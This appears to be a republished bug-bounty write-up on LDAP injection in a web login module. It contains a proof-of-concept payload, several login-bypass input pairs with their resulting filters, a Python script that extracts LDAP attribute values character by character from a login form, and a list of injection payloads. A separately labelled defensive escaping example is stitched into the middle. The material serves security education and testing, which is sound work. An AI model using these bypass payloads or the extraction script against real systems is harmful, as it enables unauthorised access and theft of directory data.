LDAP Injection
2023-5-3 02:45:58 Author: infosecwriteups.com

A Critical Security Flaw Exposing the Application to LDAP Injection Attacks

ASWIN K V

InfoSec Write-ups


Summary:

This vulnerability has the potential to cause data leakage, unauthorised access, and other major security problems. To safeguard user data and system integrity, we firmly advise that this problem be given prompt attention and remediated.

Vulnerability Details:

LDAP (Lightweight Directory Access Protocol) injection is a code injection technique that occurs when untrusted user input is directly included in an LDAP query without proper sanitization or validation.

The target application failed to adequately validate user-supplied input, leading to a potential LDAP injection vulnerability.

An attacker can use this weakness to alter LDAP queries, evade authentication checks, obtain unauthorised access to confidential data, or perform other malicious actions.

Affected Component:

The LDAP injection vulnerability affects the authentication module of the web application, specifically the code responsible for processing user credentials and authenticating against an LDAP server.

Steps to Reproduce:

  1. Identify a field within the application that interacts with LDAP queries.
  2. Craft a malicious input containing LDAP metacharacters, such as parentheses, asterisks, or backslashes.
  3. Submit the input and observe the response from the application.
  4. Note any unexpected behavior, error messages, or unusual data retrieval.

Proof of Concept:

  1. The application allows a user to log in using their username and password.
  2. The application constructs an LDAP query using the provided username without proper input validation.
  3. An attacker provides the following input in the username field: “)(cn=))(|(uid=))(|(objectClass=*”
  4. The resulting LDAP query becomes: “(&(cn=))(|(uid=))(|(objectClass=*))(userpassword=[provided password])”
  5. The attacker gains unauthorized access and potentially retrieves sensitive information or performs other malicious actions.

Login Bypass:

user=*
password=*
--> (&(user=*)(password=*))

user=*)(&
password=*)(&
--> (&(user=*)(&)(password=*)(&))

user=*)(|(password=*
password=test)
--> (&(user=*)(|(password=*)(password=test))

user=*))%00
pass=any
--> (&(user=*))%00 --> Nothing more is executed

username = admin)(!(&(|
pass = any))
--> (&(uid= admin)(!(& (|) (webpassword=any)))) --> Since (|) is FALSE, the negated branch is TRUE: the user is admin and the password check passes.

username=admin))(|(|
password=any
--> (&(uid=admin)) (| (|) (webpassword=any))
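As an added defensive example (not code from the original write-up), the Python below places the vulnerable filter construction beside a version that escapes the RFC 4515 filter metacharacters, with a small helper that lists the top-level components of the resulting filter so the structural effect of a payload such as `*)(&` is visible. The attribute names `uid` and `userPassword` and the username allowlist pattern are assumptions.

```python
import re

# RFC 4515 escaping for values placed inside an LDAP search filter: each
# metacharacter becomes a backslash plus its two-hex-digit byte value.
_FILTER_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}

# Defence in depth: allowlist for usernames (assumed policy), checked before any filter is built.
_USERNAME_RE = re.compile(r"^[A-Za-z0-9._-]{1,64}$")

def escape_filter_value(value: str) -> str:
    """Escape a user-supplied string so it can only ever be an attribute value."""
    return "".join(_FILTER_ESCAPES.get(ch, ch) for ch in value)

def is_valid_username(username: str) -> bool:
    return _USERNAME_RE.fullmatch(username) is not None

def build_login_filter_unsafe(username: str, password: str) -> str:
    """The vulnerable pattern from the write-up: raw concatenation (do not use)."""
    return f"(&(uid={username})(userPassword={password}))"

def build_login_filter(username: str, password: str) -> str:
    """Hardened version: both values escaped, so the filter keeps exactly two children."""
    return (f"(&(uid={escape_filter_value(username)})"
            f"(userPassword={escape_filter_value(password)}))")

def top_level_components(ldap_filter: str) -> list:
    """List the direct children of an (&...) filter by tracking unescaped parenthesis
    depth. A structural demo only, not a full LDAP filter parser."""
    if not (ldap_filter.startswith("(&") and ldap_filter.endswith(")")):
        raise ValueError("expected an (&...) filter")
    body = ldap_filter[2:-1]
    parts, depth, start, i = [], 0, 0, 0
    while i < len(body):
        ch = body[i]
        if ch == "\\":          # skip an escape sequence such as \29
            i += 3
            continue
        if ch == "(":
            if depth == 0:
                start = i
            depth += 1
        elif ch == ")":
            depth -= 1
            if depth == 0:
                parts.append(body[start:i + 1])
        i += 1
    return parts
```

With the unsafe builder the payload `*)(&` in both fields yields four top-level components, two of them injected `(&)` terms; with escaping the same input stays inside the two intended attribute assertions.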

Discover valid LDAP fields

LDAP objects provide various attributes by default that can be used to store data. You can attempt to brute-force all of them to retrieve that information. There is a list of default LDAP attributes here.

#!/usr/bin/python3
import requests
import string
from time import sleep
import sys

proxy = { "http": "localhost:8080" }
url = "http://10.10.10.10/login.php"
alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"

attributes = ["c", "cn", "co", "commonName", "dc", "facsimileTelephoneNumber", "givenName", "gn", "homePhone", "id", "jpegPhoto", "l", "mail", "mobile", "name", "o", "objectClass", "ou", "owner", "pager", "password", "sn", "st", "surname", "uid", "username", "userPassword",]

for attribute in attributes:  # Extract all attributes
    value = ""
    finish = False
    while not finish:
        for char in alphabet:  # In each position test each possible printable char
            query = f"*)({attribute}={value}{char}*"
            data = {'login': query, 'password': 'bla'}
            r = requests.post(url, data=data, proxies=proxy)
            sys.stdout.write(f"\r{attribute}: {value}{char}")
            #sleep(0.5)  # Avoid brute-force bans
            if "Cannot login" in r.text:  # The application's response reveals whether the prefix matched
                value += str(char)
                break

            if char == alphabet[-1]:  # If last of all the chars, then, no more chars in the value
                finish = True
                print()

Payloads:

*
*)(&
*))%00
)(cn=))\x00
*()|%26'
*()|&'
*(|(mail=*))
*(|(objectclass=*))
*)(uid=*))(|(uid=*
*/*
*|
/
//
//*
@*
|
admin*
admin*)((|userpassword=*)
admin*)((|userPassword=*)
x' or name()='username' or 'x'='y

Reference:

Impact:

An attacker can use this flaw to change the structure of an LDAP query and issue LDAP commands of their choosing.

The consequences might include unauthorised access to private data, data manipulation, or even remote code execution, depending on the rights attached to the LDAP service account.

The security and privacy of the target application could be seriously jeopardised if this vulnerability were successfully exploited.


Source: https://infosecwriteups.com/ldap-injection-653d7225dd8?source=rss----7b722bfd1b8d--bug_bounty